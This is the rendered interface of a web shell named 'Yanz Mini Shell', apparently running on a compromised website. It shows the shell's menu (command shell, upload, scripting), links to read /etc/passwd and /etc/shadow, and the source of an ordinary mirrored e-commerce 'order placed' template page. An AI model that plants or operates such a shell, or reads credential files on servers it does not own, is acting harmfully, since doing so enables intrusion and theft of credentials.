Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
firstmatrixcoin
public_html
ocean-arc.firstmatrix.co.in
plugins
sparkline
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<!DOCTYPE html> <html lang="en"> <!-- Mirrored from themes.pixelstrap.com/multikart-app/order-placed.html by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 06 May 2025 05:34:41 GMT --> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Multikart"> <meta name="keywords" content="Multikart"> <meta name="author" content="Multikart"> <link rel="manifest" href="manifest.json"> <link rel="icon" href="assets/images/favicon.png" type="image/x-icon" /> <title>Multikart PWA App</title> <link rel="icon" href="assets/images/favicon.png" type="image/x-icon" /> <link rel="apple-touch-icon" href="assets/images/favicon.png"> <meta name="theme-color" content="#ff4c3b" /> <meta name="apple-mobile-web-app-capable" content="yes"> <meta name="apple-mobile-web-app-status-bar-style" content="black"> <meta name="apple-mobile-web-app-title" content="multikart"> <meta name="msapplication-TileImage" content="assets/images/favicon.png"> <meta name="msapplication-TileColor" content="#FFFFFF"> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <!--Google font--> <link href="https://fonts.googleapis.com/css?family=Lato:300,400,700,900" rel="stylesheet"> <!-- bootstrap css --> <link rel="stylesheet" id="rtl-link" type="text/css" href="assets/css/vendors/bootstrap.css"> <!-- slick css --> <link rel="stylesheet" type="text/css" href="assets/css/vendors/slick-theme.css"> <link rel="stylesheet" type="text/css" href="assets/css/vendors/slick.css"> <!-- iconly css --> <link rel="stylesheet" type="text/css" href="assets/css/vendors/iconly.css"> <!-- Theme css --> <link rel="stylesheet" id="change-link" type="text/css" href="assets/css/style.css"> </head> <body> <!-- loader strat --> <div class="loader"> <span></span> <span></span> </div> <!-- loader end --> <!-- header start --> <header> <div class="back-links"> <a href="payment.html"> <i class="iconly-Arrow-Left icli"></i> <div class="content"> <h2>Order Placed</h2> </div> </a> </div> </header> <!-- header end --> <!-- order success section start --> <section class="order-success-section px-15 top-space xl-space"> <div> <img src="assets/images/check-circle.gif" class="img-fluid" alt=""> <h1>Order successfully!</h1> <h2>Payment is successfully processed and your Order is on the way.</h2> </div> </section> <!-- order success section end --> <!-- order details section start --> <section class="px-15"> <h2 class="page-title">Order Details</h2> <div class="details"> <ul> <li class="mb-3 d-block"> <h4 class="fw-bold mb-1">Your order # is: 64484032</h4> <h4 class="content-color">An email receipt including the details about your order has been sent to your email ID.</h4> </li> <li class="mb-3 d-block"> <h4 class="fw-bold mb-1">This order will be shipped to:</h4> <h4 class="content-color">3501 Maloy Court,</h4> <h4 class="content-color">East Elmhurst, New York City</h4> <h4 class="content-color">NY 11369</h4> </li> <li class="d-block"> <h4 class="fw-bold mb-1">Payment Method</h4> <h4 class="content-color">Google UPI</h4> </li> </ul> </div> </section> <div class="divider"></div> <!-- order details section end --> <!-- expected delivery section start --> <section class="px-15 pt-0"> <h2 class="page-title">Order Summary</h2> <div class="product-section"> <div class="row gy-3"> <div class="col-12"> <div class="product-inline"> <a href="product.html"> <img src="assets/images/products/1.jpg" class="img-fluid" alt=""> </a> <div class="product-inline-content"> <div> <a href="product.html"> <h4>Pink Hoodie t-shirt full </h4> </a> <h5 class="content-color">Size: S, Qty: 1</h5> <div class="price"> <h4>$32.00</h4> </div> </div> </div> </div> </div> <div class="col-12"> <div class="product-inline"> <a href="product.html"> <img src="assets/images/products/2.jpg" class="img-fluid" alt=""> </a> <div class="product-inline-content"> <div> <a href="product.html"> <h4>Men Blue Denim Jacket</h4> </a> <h5 class="content-color">Size: S, Qty: 1</h5> <div class="price"> <h4>$32.00</h4> </div> </div> </div> </div> </div> </div> </div> </section> <!-- expected delivery section end --> <!-- order details start --> <section class="px-15"> <div class="order-details"> <ul> <li> <h4>Bag total <span>$220.00</span></h4> </li> <li> <h4>Bag savings <span class="text-green">-$20.00</span></h4> </li> <li> <h4>Coupon Discount <span>$20.00</span></h4> </li> <li> <h4>Delivery <span>$50.00</span></h4> </li> </ul> <div class="total-amount"> <h4>Total Amount <span>$270.00</span></h4> </div> </div> </section> <!-- order details end --> <!-- panel space start --> <section class="panel-space"></section> <!-- panel space end --> <!-- bottom panel start --> <div class="delivery-cart cart-bottom"> <div> <div class="left-content"> <a href="order-tracking.html" class="title-color">Track Order</a> </div> <a href="index.html" class="btn btn-solid">Continue shopping</a> </div> </div> <!-- bottom panel end --> <!-- latest jquery--> <script src="assets/js/jquery-3.3.1.min.js"></script> <!-- Bootstrap js--> <script src="assets/js/bootstrap.bundle.min.js"></script> <!-- Slick js--> <script src="assets/js/slick.js"></script> <!-- script js --> <script src="assets/js/script.js"></script> </body> <!-- Mirrored from themes.pixelstrap.com/multikart-app/order-placed.html by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 06 May 2025 05:34:41 GMT --> </html>
Free Space : 12118843392 Byte